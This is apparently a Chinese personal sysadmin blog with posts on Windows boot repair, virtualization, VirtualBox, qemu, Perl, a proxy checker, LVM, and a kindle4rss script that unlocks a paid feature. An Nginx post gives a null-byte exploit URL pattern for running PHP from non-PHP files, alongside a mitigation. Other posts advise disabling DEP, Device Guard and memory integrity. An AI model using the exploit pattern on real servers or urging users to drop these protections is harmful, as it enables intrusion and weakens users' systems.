VITTER'S BLOG

笔记本整盘GHOST后UEFI失效修复

GHOST的是整个硬盘而不是系统分区，恢复的时候选择Local->Disk->FORM Image ，恢复后启动进不了系统。进BIOS里发现UEFI丢了。修复过程如下：

1、进winpe用DiskGenius把UEFI分区删掉重建，注意在“请选择文件系统类型”菜单里选择EFI system partition，其他选项默认即可，点击确定：

然后会创建一个新的名为ESP的分区，完成后保存更改并格式化。
右键点击这个ESP分区指派新的驱动器盘符并记住，后面会用到。

2、启动命令提示符使用bcdboot重建UEFI。

bcdboot c:\windows /s f: /f UEFI /l zh-CN

执行如上命令，可以看到已成功创建启动文件的提示。第一个参数c:\windows是系统目录，要改成实际你的系统所在的分区；第二个/s f:，要改成刚才新建的ESP分区；/l是语言。

现在重启电脑就可以通过UEFI启动了。

备注：

1、取消倒计时的启动列表：

右击桌面“此电脑”->选择“属性”->打开“高级系统设置”->启动和故障恢复设，去掉选项“显示操作系统列表的时间”确定保存，完成。

2、删除多余启动列表引导菜单：

Windows徽标+R键输入命令msconfig回车，打开系统配置功能->引导，选中不想要的项删除，点击确定关闭界面。

招商银行专业版因安全设置崩溃问题解决

surface book3 Windows10专业版新装的招商银行专业版发现好多调用浏览器打开的地方会导致程序崩溃退出，比如转账汇款功能开通，修改联系信息等，有个共通点就是感觉调用浏览器打开页面，因为会显示加载中，请稍后。找客服也没解决，好多年前我也遇到过类似问题，好像是微软的一个补丁导致的。研究了下感觉是跟Windows10安全设置有关，所以就找了找，发现果真如此，解决办法如下：

设置中找到Windows安全中心>应用和浏览器控制>Exploit Protection设置>程序设置>添加程序进行自定义，把招商银行程序添加进来关掉数据执行保护（DEP），然后重新打开招商银行程序问题解决。

Surface Book 3 i71035G7 Windows10专业版开启VT-x虚拟化支持

之前的surface pro 屏幕被我摔漏液好久了，现在终于换了全新顶配企业版surface book 3新CPU i71035G7，在做数据迁移的时候由于要用到老的虚机使用的是VirtualBox发现不支持VT-x。

由于在surface的UEFI没法修改，看来是微软在底层做了一些限制，迁移Hyper-V又麻烦，查了下资料发现跟Device/Credential Guard有关系，最后成功开启VT-x，具体操作如下：

1、禁用Hyper-V：

控制面板>程序和功能>启用或关闭Windows功能，把整个“Hyper-V”全取消。

2、组策略禁用Device Guard：

运行组策略编辑器，找到计算机配置>管理模板>系统>Device Guard，然后把“打开基于虚拟化的安全”这一项设置成“已禁用”。

3、关闭启动加载器中的hypervisor：

以管理员权限运行PowerShell执行如下命令：

bcdedit /set hypervisorlaunchtype off

4、注册表禁用Device/Credential Guard：

运行注册表编辑器，找到“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard”将“EnableVirtualizationBasedSecurity”和“RequireMicrosoftSignedBootChain”两项都设置成“0”。

再找到“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity”下把“Enabled”设置成“0”。

5、关闭Windows Defender中的内存完整性：

设置>更新和安全>Windows安全中心>设备安全性>内核隔离中把“内存完整性”设置成“关”。

重启后就会支持VT-x了。

关于Device/Credential Guard可参考官方文档：管理 Windows Defender Credential Guard

战略

又有书啃了。

VirtualBox收缩虚拟磁盘映像vdi文件

我的VirtualBox虚拟机磁盘文件采用动态扩展镜像的方式，时间长了虚机里面安装卸载东西，磁盘镜像文件越来越大，即使虚机里面删除了文件释放空间，但是镜像文件并不自动收缩。我知道VMware什么的都有工具对磁盘文件进行收缩，VirtualBox以前不用，查了下也可以实现。

基本思路如下：

1.虚拟机里面: 清理系统空间，卸载、删除系统垃圾文件，磁盘清理比如补丁更新备份，关掉分页文件等，总之就是先减少使用空间；

2.虚拟机里面: 将磁盘上数据往前移，并将剩余磁盘空间并写零；

3.物理主机: 清除“零”字节空间，使用VBoxManage工具的modifyhd参数压缩VDI磁盘镜像文件。

具体操作如下（虚拟机以Windows为例）：

1.虚拟机里: 删除系统垃圾文件后，运行磁盘整理程序，可以使用Windows自带的“磁盘碎片整理工具”。另外推荐使用Defraggler，这是一款免费的磁盘碎片整理工具，简单、速度快。
Defraggler下载地址：http://www.filehippo.com/download_defraggler/

2.虚拟机里: 用 SDelete 工具写零，在命令行下执行：
sdelete -c -z c:
SDelete下载地址：http://technet.microsoft.com/en-us/sysinternals/bb897443.aspx
完成后虚拟机关机

3.物理机里: 执行：
vboxmanage modifyhd win7x32.vdi --compact
D:\VirtualBox VMs\win7x32>vboxmanage modifyhd win7x32.vdi --compact
0%...10%...20%...30%...40%...50%...60%...70%...80%...90%...100%
完成后磁盘镜像文件会收缩。

虚拟机是Linux的类似，先用dd if=/dev/zero of=0.file 然后删掉 rm 0.file。物理主机不管Linux还是Windows都是用VBoxManage命令的modifyhd参数。

Python写的代理服务器验证程序

最近有需要批量使用代理服务器，从代理网站上爬下ip和端口，挨个验证找了个python程序用来批量验证。

# cat checkporxy.py

#!/usr/bin/env python 
import Queue
import threading
import urllib2
import time
import sys
#def check_argv():
if len(sys.argv) != 3:
        print """usage: %s proxylist.txt checkok.txt """ % sys.argv[0]
        sys.exit(1)
file1=sys.argv[1]
file2=sys.argv[2]

input_file = file1
output_file = file2

threads = 50

queue = Queue.Queue()
output = []

file_object = open(output_file, 'w') 
file_object.write("") 
file_object.close( )

class ThreadUrl(threading.Thread):
    """Threaded Url Grab"""
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        while True:
            #grabs host from queue
            proxy_info = self.queue.get()
            try:
        print "test proxy:"+proxy_info+"|\n"
        proxy_handler = urllib2.ProxyHandler({'http':proxy_info})
                opener = urllib2.build_opener(proxy_handler)
                opener.addheaders = [('User-agent','Mozilla/5.0')]
                urllib2.install_opener(opener) 
                req = urllib2.Request("http://www.google.com") 
                sock=urllib2.urlopen(req, timeout= 15)
                rs = sock.read(1000)
                if '<title>Google</title>' in rs:
                    output.append(('0',proxy_info))
                    print "ok :"+proxy_info+"\n"
                    file_object = open(output_file, 'a')
                    file_object.write(proxy_info)
                    file_object.write("\n")
                    file_object.close( )
                else:
                    raise "Not Google"
            except:
                output.append(('x',proxy_info))
            #signals to queue job is done
            self.queue.task_done()

start = time.time()
def main():

    #spawn a pool of threads, and pass them queue instance
    for i in range(threads):
        t = ThreadUrl(queue)
        t.setDaemon(True)
        t.start()
    hosts = [host.strip() for host in open(input_file).readlines()]
    #populate queue with data  
    for host in hosts:
        queue.put(host)

    #wait on the queue until everything has been processed    
    queue.join()

main()
for proxy,host in output:
    print proxy,host

print "Elapsed Time: %s" % (time.time() - start)

用kindle4rss自动推送RSS到Kindle paperwhite

上月从亚马逊日本网站花87美金买了个Kindle paperwhite，然后解决了定时自动通送rss订阅的问题。

1、先去kindle4rss.com网站注册个帐号；

2、在kindle4rss.com网站设置好Kindle的邮件地址，支持kindle和多看；

3、在kindle4rss.com网站订阅他的资源或者订阅自己提交的Feed地址；

4、收费的专业版支持自动定时推送，免费版不支持。解决方法很简单，找台服务器crontab里面定时执行以下php程序。

如：0  * * * * /usr/local/php/bin/php /tools/kindle/cron.php

cat /tools/kindle/cron.php

<?php
chdir("/tools/kindle/");
define('USERNAME', 'vitter@aaaaaaa.com'); //kindle4rss的帐号
define('PASSWORD', '111111');  //kindle4rss的密码
$login_url = "http://kindle4rss.com/login/";
$submit_url = "http://kindle4rss.com/send_now/";
$cookie_file = "cookie.kindle";

function getContent($url, $post = false)
{
        global $cookie_file;

        $ch = curl_init();
        if ($post)
        {
                curl_setopt($ch, CURLOPT_POST, 1);
                list($url, $param) = split('\?', $url);
                if ($param)
                {
                        curl_setopt($ch, CURLOPT_POSTFIELDS, $param);
                }
        }
        else
        {
                curl_setopt($ch, CURLOPT_HTTPGET, 1);
        }

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
        curl_setopt($ch, CURLOPT_COOKIEJAR, realpath($cookie_file));
        curl_setopt($ch, CURLOPT_COOKIEFILE, realpath($cookie_file));
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

        if (strstr($url, 'https://'))
        {
                curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
                curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
        }

        $recvData = curl_exec($ch);
        curl_close($ch);

        if ($recvData)
        {
                $recvData = preg_replace('/[\r\n\t]/', '', $recvData);
        }

        return $recvData;
}

function doLogin($username, $password)
{
        global $login_url, $cookie_file;

        $handle = fopen($cookie_file, 'w');
        fclose($handle);

        $ret = false;
        $response = getContent($login_url . "?email_address=$username&password=$password", true);

        if ($response)
        {
                $matchcount = preg_match("/" . $username . "/i", $response, $matches);
                if ($matchcount)
                {
                        $ret = true;
                }
                else
                {
                        $err_msg = "登录：用户或密码错";
                }
        }
        else
        {
                $err_msg = "登录：未知错误";
        }

        if (!$ret)
        {
                echo $err_msg . '<br>';
        }

        return $ret;
}

function doSubmit()
{
        global $submit_url;

        $ret = false;
        $response = getContent($submit_url, true);

        if ($response)
        {
                $matchcount = preg_match("/\/send_now/i", $response, $matches);
                if ($matchcount)
                {
                        $err_msg .= "推送：推送失败";
                }
                else
                {
                        $ret = true;
                }
        }
        else
        {
                $err_msg .= "推送：未知错误";
        }

        if (!$ret)
        {
                echo $err_msg . '<br>';
        }

        return $ret;
}

if (!doLogin(USERNAME, PASSWORD))
{
        echo '登录失败';
        exit;
}

if (doSubmit())
{
        echo '推送完成';
}
?>

这样就省了kindle4rss的专业版的钱了：）

解决用live writer写blog报Couldn't open encmap gb2312.enc错误问题

vitter@securitycn.net

今天发布了一篇blog，但是用live writer发布的时候报错：
Couldn't open encmap gb2312.enc
No such file or directory
at /usr/lib/perl5/XML/Parser/Parser.pm line 187
如图一所示：

估计是XML::Parser模块的问题，上网搜了下大体上是说这个模块对gb2312不支持，需要自己生成一个gb2312.enc放到/usr/lib/perl5/XML/Parser/Encodings下，按照/usr/lib/perl5/XML/Parser/Encoding/README的方法。

       1. Download GB2312.TXT from ftp.unicode.org，现在unicode.org不提供下载了，这个东西目前下载地址是http://search.cpan.org/src/GUS/Unicode-UTF8simple-1.06/gb2312.txt
       2. 下载安装 XML::Encoding 他有两个脚本 make_encmap 和 compile_encoding 可用来生成码表文件。
       3. 用 make_encmap 生成GB2312.encmap: make_encmap GB2312 GB2312.TXT > GB2312.encmap
       4. Add expat='yes' to the first line of GB2312.encmap 如：<encmap name='GB2312' expat='yes'>
       5. 用 compile_encoding生成enc文件: compile_encoding -o GB2312.enc GB2312.encmap
       6. copy GB2312.enc 到 /usr/lib/perl5/XML/Parser/Encodings

这个方法不行了，使用make_enmap的时候需要改下载来的GB2312.TXT。因为在GB2312.txt中,中文编码0x2121的应该为0xa1a1, 即第一列值全部需要加0x8080,这样就可以了。修改 make_enmap给需要处理的地方每个值加0x80。

这样太麻烦，网上搜了下，从http://www.linuxforum.net/forum/showflat.php?Cat=&Board=xml&Number=317458这下了一个按此方法生成好的http://www.linuxforum.net/forum/files/316936-gb2312-encoding.tgz 文件。发现用live writer打开发布的文章的时候取回来的正常，但是发布乱码gb2312的变成了utf-8。

还有人说gb2312用的是ftp://ftp.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/WINDOWS/CP936.TXT，CP936，同理生成等enc文件结果也出现类似问题，打开没事，发布乱码。

去系统目录下找用这个模块的文件如下：
find . -name "*" -exec fgrep -l 'Parser' {} \;     
./extlib/SOAP/Transport/HTTP.pm
./extlib/SOAP/Lite.pm
./extlib/XML/Parser/Lite.pm
./extlib/HTML/Form.pm
./extlib/LWP/Protocol.pm
./lib/MT/Builder.pm
./lib/MT/XMLRPCServer.pm
看似应该是XMLRPCServer.pm这个文件：
如图二

之后继续折腾了几个小时，甚至升级了XML::Parser模块，也不行。

下班回家后找了以前能用的centos5的系统，对比了下centos6跟5的perl插件，发现之前的系统根本没装这个模块。
centos6上：
[root@securitycn ~]# perl -MXML::Parser -e 'print XML::Parser->VERSION. "\n"'
2.41
而centos5能正常发布的系统上：
[root@security02 ~]# perl -MXML::Parser -e 'print XML::Parser->VERSION. "\n"' 
Can't locate XML/Parser.pm in @INC (@INC contains: /usr/lib/perl5/site_perl/5.8.8/i386-linux-thread-multi /usr/lib/perl5/site_perl/5.8.8 /usr/lib/perl5/site_perl /usr/lib/perl5/vendor_perl/5.8.8/i386-linux-thread-multi /usr/lib/perl5/vendor_perl/5.8.8 /usr/lib/perl5/vendor_perl /usr/lib/perl5/5.8.8/i386-linux-thread-multi /usr/lib/perl5/5.8.8 .).
BEGIN failed--compilation aborted.
没装这个模块。
用下面脚本卸载cpan安装的XML::Parser模块：
[root@securitycn ~]# cat cpan-uninstall.pl

#!/usr/local/bin/perl --
use ExtUtils::Installed;
use ExtUtils::Install;
$module = $ARGV[0];
$inst = ExtUtils::Installed->new();
@modules = $inst->modules();
(grep $module,@modules) || die "$module is not install...";
uninstall($inst->packlist($module)->packlist_file());
print "uninstalled $module\n";

[root@securitycn ~]# perl cpan-uninstall.pl XML::Parser
卸完再查发现系统自带rpm的模块
[root@securitycn ~]# perl -MXML::Parser -e 'print XML::Parser->VERSION. "\n"'
2.36
[root@securitycn ~]# rpm -qa |grep perl-XML-Parser
perl-XML-Parser-2.36-7.el6.i686
rpm卸载：
[root@securitycn ~]# rpm -e perl-XML-Parser-2.36-7.el6.i686                 
error: Failed dependencies:
        perl(XML::Parser) is needed by (installed) perl-libxml-perl-0.08-10.el6.noarch
        perl(XML::Parser) is needed by (installed) perl-XML-Twig-3.34-1.el6.noarch
强制卸载：
[root@securitycn ~]# rpm -e perl-XML-Parser-2.36-7.el6.i686  --nodeps
[root@securitycn ~]#  perl -MXML::Parser -e 'print XML::Parser->VERSION. "\n"'
Can't locate XML/Parser.pm in @INC (@INC contains: /usr/local/lib/perl5 /usr/local/share/perl5 /usr/lib/perl5/vendor_perl /usr/share/perl5/vendor_perl /usr/lib/perl5 /usr/share/perl5 .).
BEGIN failed--compilation aborted.

然后再用live writer读取发布文档都没问题了。

FreeBSD6.2上更新qemu安装BackTrack5 R2

vitter@securitycn.net

前两天想用下BT，发现我FREEBSD主机里面虚拟机装的还是BT4，上BT官网发现现在是BT5R2，下载回来，放qemu虚拟里面发现startx的时候显卡不支持，如图1：

lspci如图2：

我qemu是0.9的版本，man了下qemu，只支持这一种，不支持指定虚拟显卡的型号，只能虚拟成Cirrus Logic GD5446 Video card。上官网查文档发现给出的文档里面已经有-vga参数了，支持3中型号，其中vmware应该是BT5能支持的。如图3：

下面就更新qemu为新版本吧。

1、使用portsnap更新ports
由于我是第一次用portsnap更新：
[root@securitycn.com ~]# portsnap fetch extract
更新速度较慢，以后的话用：
portsnap fetch update
可以修改/etc/portsnap.conf里面的SERVERNAME更换国内较快的服务器。

2、使用ports更新qemu
[root@securitycn.com ~]# cd /usr/ports/emulators/qemu
[root@securitycn.com qemu]# make deinstall reinstall clean

可能会有关联的软件是老版本报错。根据报错找到老版本卸掉。如：
[root@securitycn.com qemu]# pkg_info |grep libtool
pkg_info: show_file: can't open '+COMMENT' for reading
libtool-2.4.2       Generic shared library support script
[root@securitycn.com qemu]# pkg_delete libtool-2.4.2

更新后是0.11.1的版本了。

[root@securitycn.com ~]# qemu -h
QEMU PC emulator version 0.11.1, Copyright (c) 2003-2008 Fabrice Bellard
usage: qemu [options] [disk_image]

'disk_image' is a raw hard image image for IDE hard disk 0

Standard options:
-h or -help     display this help and exit
-version        display version information and exit
-M machine      select emulated machine (-M ? for list)
-cpu cpu        select CPU (-cpu ? for list)
-smp n          set the number of CPUs to 'n' [default=1]
-numa node[,mem=size][,cpus=cpu[-cpu]][,nodeid=node]
-fda/-fdb file  use 'file' as floppy disk 0/1 image
-hda/-hdb file  use 'file' as IDE hard disk 0/1 image
-hdc/-hdd file  use 'file' as IDE hard disk 2/3 image
-cdrom file     use 'file' as IDE cdrom image (cdrom is ide1 master)
-drive [file=file][,if=type][,bus=n][,unit=m][,media=d][,index=i]
       [,cyls=c,heads=h,secs=s[,trans=t]][,snapshot=on|off]
       [,cache=writethrough|writeback|none][,format=f][,serial=s]
       [,addr=A]
                use 'file' as a drive image
-mtdblock file  use 'file' as on-board Flash memory image
-sd file        use 'file' as SecureDigital card image
-pflash file    use 'file' as a parallel flash image
-boot [order=drives][,once=drives][,menu=on|off]
                'drives': floppy (a), hard disk (c), CD-ROM (d), network (n)
-snapshot       write to temporary files instead of disk image files
-m megs         set virtual RAM size to megs MB [default=128]
-k language     use keyboard layout (for example 'fr' for French)
-audio-help     print list of audio drivers and their options
-soundhw c1,... enable audio support
                and only specified sound cards (comma separated list)
                use -soundhw ? to get the list of supported cards
                use -soundhw all to enable all of them
-usb            enable the USB driver (will be the default soon)
-usbdevice name add the host or guest USB device 'name'
-name string1[,process=string2]    set the name of the guest
            string1 sets the window title and string2 the process name (on Linux)
-uuid %08x-%04x-%04x-%04x-%012x
                specify machine UUID

Display options:
-nographic      disable graphical output and redirect serial I/Os to console
-curses         use a curses/ncurses interface instead of SDL
-no-frame       open SDL window without a frame and window decorations
-alt-grab       use Ctrl-Alt-Shift to grab mouse (instead of Ctrl-Alt)
-no-quit        disable SDL window close capability
-sdl            enable SDL
-portrait       rotate graphical output 90 deg left (only PXA LCD)
-vga [std|cirrus|vmware|xenfb|none]
                select video card type
-full-screen    start in full screen
-vnc display    start a VNC server on display

1 target only:
-win2k-hack     use it when installing Windows 2000 to avoid a disk full bug
-rtc-td-hack    use it to fix time drift in Windows ACPI HAL
-no-fd-bootchk  disable boot signature checking for floppy disks
-no-acpi        disable ACPI
-no-hpet        disable HPET
-balloon none   disable balloon device
-balloon virtio[,addr=str]
                enable virtio balloon device (default)
-acpitable [sig=str][,rev=n][,oem_id=str][,oem_table_id=str][,oem_rev=n][,asl_compiler_id=str][,asl_compiler_rev=n][,data=file1[:file2]...]
                ACPI table description
-smbios file=binary
                Load SMBIOS entry from binary file
-smbios type=0[,vendor=str][,version=str][,date=str][,release=%d.%d]
                Specify SMBIOS type 0 fields
-smbios type=1[,manufacturer=str][,product=str][,version=str][,serial=str]
              [,uuid=uuid][,sku=str][,family=str]
                Specify SMBIOS type 1 fields

Network options:
-net nic[,vlan=n][,macaddr=mac][,model=type][,name=str][,addr=str][,vectors=v]
                create a new Network Interface Card and connect it to VLAN 'n'
-net user[,vlan=n][,name=str][,net=addr[/mask]][,host=addr][,restrict=y|n]
         [,hostname=host][,dhcpstart=addr][,dns=addr][,tftp=dir][,bootfile=f]
         [,hostfwd=rule][,guestfwd=rule][,smb=dir[,smbserver=addr]]
                connect the user mode network stack to VLAN 'n', configure its
                DHCP server and enabled optional services
-net pcap[,vlan=n][,name=str][,ifname=name]
                connect the host network interface using PCAP to VLAN 'n'
-net udp[,vlan=n],sport=sport,dport=dport,daddr=host
                connect the vlan 'n' to a udp host (for dynamips/pemu/GNS3)
-net tap[,vlan=n][,name=str][,fd=h][,ifname=name][,script=file][,downscript=dfile]
                connect the host TAP network interface to VLAN 'n' and use the
                network scripts 'file' (default=/usr/local/etc/qemu-ifup)
                and 'dfile' (default=/usr/local/etc/qemu-ifdown);
                use '[down]script=no' to disable script execution;
                use 'fd=h' to connect to an already opened TAP interface
-net socket[,vlan=n][,name=str][,fd=h][,listen=[host]:port][,connect=host:port]
                connect the vlan 'n' to another VLAN using a socket connection
-net socket[,vlan=n][,name=str][,fd=h][,mcast=maddr:port]
                connect the vlan 'n' to multicast maddr and port
-net dump[,vlan=n][,file=f][,len=n]
                dump traffic on vlan 'n' to file 'f' (max n bytes per packet)
-net none       use it alone to have zero network devices; if no -net option
                is provided, the default is '-net nic -net user'

-bt hci,null    dumb bluetooth HCI - doesn't respond to commands
-bt hci,host[:id]
                use host's HCI with the given name
-bt hci[,vlan=n]
                emulate a standard HCI in virtual scatternet 'n'
-bt vhci[,vlan=n]
                add host computer to virtual scatternet 'n' using VHCI
-bt device:dev[,vlan=n]
                emulate a bluetooth device 'dev' in scatternet 'n'

Linux/Multiboot boot specific:
-kernel bzImage use 'bzImage' as kernel image
-append cmdline use 'cmdline' as kernel command line
-initrd file    use 'file' as initial ram disk

Debug/Expert options:
-serial dev     redirect the serial port to char device 'dev'
-parallel dev   redirect the parallel port to char device 'dev'
-monitor dev    redirect the monitor to char device 'dev'
-pidfile file   write PID to 'file'
-singlestep   always run in singlestep mode
-S              freeze CPU at startup (use 'c' to start execution)
-gdb dev        wait for gdb connection on 'dev'
-s              shorthand for -gdb tcp::1234
-d item1,...    output log to /tmp/qemu.log (use -d ? for a list of log items)
-hdachs c,h,s[,t]
                force hard disk 0 physical geometry and the optional BIOS
                translation (t=none or lba) (usually qemu can guess them)
-L path         set the directory for the BIOS, VGA BIOS and keymaps
-bios file      set the filename for the BIOS
-kernel-kqemu   enable KQEMU full virtualization (default is user mode only)
-enable-kqemu   enable KQEMU kernel module usage
-no-reboot      exit instead of rebooting
-no-shutdown    stop before shutdown
-loadvm [tag|id]
                start right away with a saved state (loadvm in monitor)
-daemonize      daemonize QEMU after initializing
-option-rom rom load a file, rom, into the option ROM space
-clock          force the use of the given methods for timer alarm.
                To see what timers are available use -clock ?
-localtime      set the real time clock to local time [default=utc]
-startdate      select initial date of the clock
-icount [N|auto]
                enable virtual instruction counter with 2^N clock ticks per
                instruction
-watchdog i6300esb|ib700
                enable virtual hardware watchdog [default=none]
-watchdog-action reset|shutdown|poweroff|pause|debug|none
                action when watchdog fires [default=reset]
-echr chr       set terminal escape character instead of ctrl-a
-virtioconsole c
                set virtio console
-show-cursor    show cursor
-tb-size n      set TB size
-incoming p     prepare for incoming migration, listen on port p
-chroot dir     Chroot to dir just before starting the VM.
-runas user     Change to user id user just before starting the VM.

During emulation, the following keys are useful:
ctrl-alt-f      toggle full screen
ctrl-alt-n      switch to virtual console 'n'
ctrl-alt        toggle mouse and keyboard grab

When using -nographic, press 'ctrl-a h' to get some help.

已经支持-vga的参数了。更新完成后发现一个问题，就是显卡支持了，网络不行了。通过tcpdump抓包发现tap0的虚拟网卡上有数据包，只是说明qemu没问题，应该是桥接出的问题。

[root@securitycn.com ~]# uname -a
FreeBSD securitycn.com. 6.2-STABLE FreeBSD 6.2-STABLE #0: Thu Jul 12 18:41:38 CST 2007     root@securitycn.:/usr/src/sys/i386/compile/VitterSKERNEL  i386
[root@securitycn.com ~]# ifconfig
fxp0: flags=8943<UP,BROADCAST,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
        options=8<VLAN_MTU>
        inet 10.9.2.38 netmask 0xfffffe00 broadcast 10.9.3.255
        ether 00:16:76:d4:d7:76
        media: Ethernet autoselect (100baseTX <full-duplex>)
        status: active
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
        inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2
        inet6 ::1 prefixlen 128
bridge0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        ether 66:0b:9a:87:00:15
        priority 32768 hellotime 2 fwddelay 15 maxage 20
tap0: flags=8943<UP,BROADCAST,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
        ether 00:bd:2a:9d:02:00
        Opened by PID 1145   
[root@securitycn.com ~]# kldstat
Id Refs Address    Size     Name
1   22 0xc0400000 3e4d1c   kernel
2    4 0xc07e5000 1be80    linux.ko
3    1 0xc0801000 5e80     if_tap.ko
4    1 0xc0807000 79e450   nvidia.ko
5    1 0xc0fa6000 80b0     bridge.ko
6    1 0xc0faf000 b980     if_bridge.ko
7    1 0xc0fbb000 8ea4     aio.ko
8    1 0xc0fc4000 2020c    kqemu.ko
9    1 0xc0fe5000 5b2d0    acpi.ko
10    1 0xc57d3000 6000     linprocfs.ko
11    1 0xc5a18000 d000     ipfw.ko
12    1 0xc5afb000 2000     rtc.ko

发现之前配置的/boot/loader.conf中

aio_load="YES"
kqemu_load="YES"
bridge_load="YES"
if_tap_load="YES"
if_bridge_load="YES"

/etc/sysctl.conf中

net.link.tap.user_open=1

/etc/rc.conf中

kqemu_enable="YES"
cloned_interfaces="bridge0"
ifconfig_bridge0="addm fxp0"

都是生效的。内核也是自己编译过的，支持桥接、虚拟化等，下面手动创建桥：

[root@securitycn.com ~]# sysctl net.link.ether.bridge_cfg=fxp0,tap0
net.link.ether.bridge_cfg:  -> fxp0,tap0
[root@securitycn.com ~]# sysctl net.link.ether.bridge.enable=1
net.link.ether.bridge.enable: 0 -> 1

再启动qemu 加-net tap的参数，网络ok了。估计是老版本的qemu自动启动的时候执行了建立桥接的脚本或程序，新版本的默认是/usr/local/etc/qemu-ifup里面没有执行任何东西。
把上面2个写如开机启动，在/etc/sysctl.conf加入：

net.link.ether.bridge_cfg=fxp0,tap0
net.link.ether.bridge.enable=1

至此全搞定，下面就可以安装BT5了：
[root@securitycn.com ~]# /usr/local/bin/qemu -net nic,macaddr=00:0A:EE:77:33:00 -net tap -hda /qemu/bt5.img -cdrom /usr/home/vitter/BT5R2-GNOME-32.iso -boot d -m 435 -localtime -vga vmware

安装和汉化略，网上到处是汉化的教程。

Nginx又爆漏洞

by:blog.vfocus.net

脱裤黑客们又有的玩了。

Nginx如下版本：
0.5.*, 0.6.*, 0.7 <= 0.7.65, 0.8 <= 0.8.37
在使用PHP-FastCGI执行php的时候，URL里面在遇到%00空字节时与FastCGI处理不一致，导致可在非php文件中嵌入php代码，通过访问url+%00.php来执行其中的php代码。如：http://local/robots.txt%00.php会把robots.txt文件当作php来执行。

目前还有许多nginx的低版本服务器存在此漏洞，要养成禁止上传文件目录下执行php的好习惯。

临时解决办法，在nginx虚拟机配置或者fcgi.conf配置加如下代码：

if ($request_filename ~* (.*)\.php) {
    set $php_url $1;
}
if (!-e $php_url.php) {
    return 403;
}

当然升级到最新版本的nginx可以很好解决问题。

Linux下挂载LVM遇到卷组同名的解决方法

by:vitter@safechina.net
blog:blog.vfocus.net

周末朋友的服务器硬盘出问题了，让IDC的人挂了个IDE硬盘把系统安装好，然后再挂上以前的SATA硬盘，想把数据倒腾出来，结果哥们发现他搞不定，给我打电话求助。我远程上去看了下，发现2块盘系统做的都是LVM分区格式8e，不是ext3的83，难怪他不会挂载，而且还有个问题就是卷组都是默认安装的同一个名字VolGroup00。

[root@locallhost ~]# pvs
  PV         VG         Fmt  Attr PSize   PFree
  /dev/hda2  VolGroup00 lvm2 a-    74.41G    0
  /dev/sda2  VolGroup00 lvm2 a-   232.78G    0

hda2是新系统盘74G多，sda2是老数据盘232G多。卷组名称一样，因为2个系统安装的时候都是默认安装的。

[root@locallhost ~]# vgs
  VG         #PV #LV #SN Attr   VSize   VFree
  VolGroup00   1   2   0 wz--n- 232.78G    0
  VolGroup00   1   2   0 wz--n-  74.41G    0

我们先用vgrename改卷组名：

[root@locallhost ~]# vgrename VolGroup00 aaalvm
  Found more than one VG called VolGroup00. Please supply VG uuid.

直接报有同名，需要用uuid。查uuid可以用vgdisplay或vgs -v：

[root@locallhost ~]# vgdisplay
  --- Volume group ---
  VG Name               VolGroup00
  System ID
  Format                lvm2
  Metadata Areas        1
  Metadata Sequence No  3
  VG Access             read/write
  VG Status             resizable
  MAX LV                0
  Cur LV                2
  Open LV               2
  Max PV                0
  Cur PV                1
  Act PV                1
  VG Size               232.78 GB
  PE Size               32.00 MB
  Total PE              7449
  Alloc PE / Size       7449 / 232.78 GB
  Free  PE / Size       0 / 0
  VG UUID               bAydq6-rv9e-wCa0-iK2f-zFWn-UBUr-4AR3Ct

  --- Volume group ---
  VG Name               VolGroup00
  System ID
  Format                lvm2
  Metadata Areas        1
  Metadata Sequence No  3
  VG Access             read/write
  VG Status             resizable
  MAX LV                0
  Cur LV                2
  Open LV               2
  Max PV                0
  Cur PV                1
  Act PV                1
  VG Size               74.41 GB
  PE Size               32.00 MB
  Total PE              2381
  Alloc PE / Size       2381 / 74.41 GB
  Free  PE / Size       0 / 0
  VG UUID               YHLmkq-b1xS-UzAS-Y3nv-6vaX-2Xou-GScvk0

[root@locallhost ~]# vgs -v
    Finding all volume groups
    Finding volume group "VolGroup00"
    Archiving volume group "VolGroup00" metadata (seqno 3).
    Archiving volume group "VolGroup00" metadata (seqno 3).
    Creating volume group backup "/etc/lvm/backup/VolGroup00" (seqno 3).
    Finding volume group "VolGroup00"
    Archiving volume group "VolGroup00" metadata (seqno 3).
    Archiving volume group "VolGroup00" metadata (seqno 3).
    Creating volume group backup "/etc/lvm/backup/VolGroup00" (seqno 3).
  VG         Attr   Ext    #PV #LV #SN VSize   VFree VG UUID
  VolGroup00 wz--n- 32.00M   1   2   0 232.78G    0  bAydq6-rv9e-wCa0-iK2f-zFWn-UBUr-4AR3Ct
  VolGroup00 wz--n- 32.00M   1   2   0  74.41G    0  YHLmkq-b1xS-UzAS-Y3nv-6vaX-2Xou-GScvk0

查到数据盘的uuid是bAydq6-rv9e-wCa0-iK2f-zFWn-UBUr-4AR3Ct，改卷组名的时候用uuid，如下：

[root@locallhost ~]# vgrename bAydq6-rv9e-wCa0-iK2f-zFWn-UBUr-4AR3Ct aaalvm
  Volume group "VolGroup00" successfully renamed to "aaalvm"

ok了，改完再vgs看下：

[root@locallhost ~]# vgs
  VG         #PV #LV #SN Attr   VSize   VFree
  VolGroup00   1   2   0 wz--n-  74.41G    0
  aaalvm       1   2   0 wz--n- 232.78G    0

没问题了，再lvscan下：

[root@locallhost ~]# lvscan
  inactive          '/dev/aaalvm/LogVol00' [228.84 GB] inherit
  inactive          '/dev/aaalvm/LogVol01' [3.94 GB] inherit
  ACTIVE            '/dev/VolGroup00/LogVol00' [70.47 GB] inherit
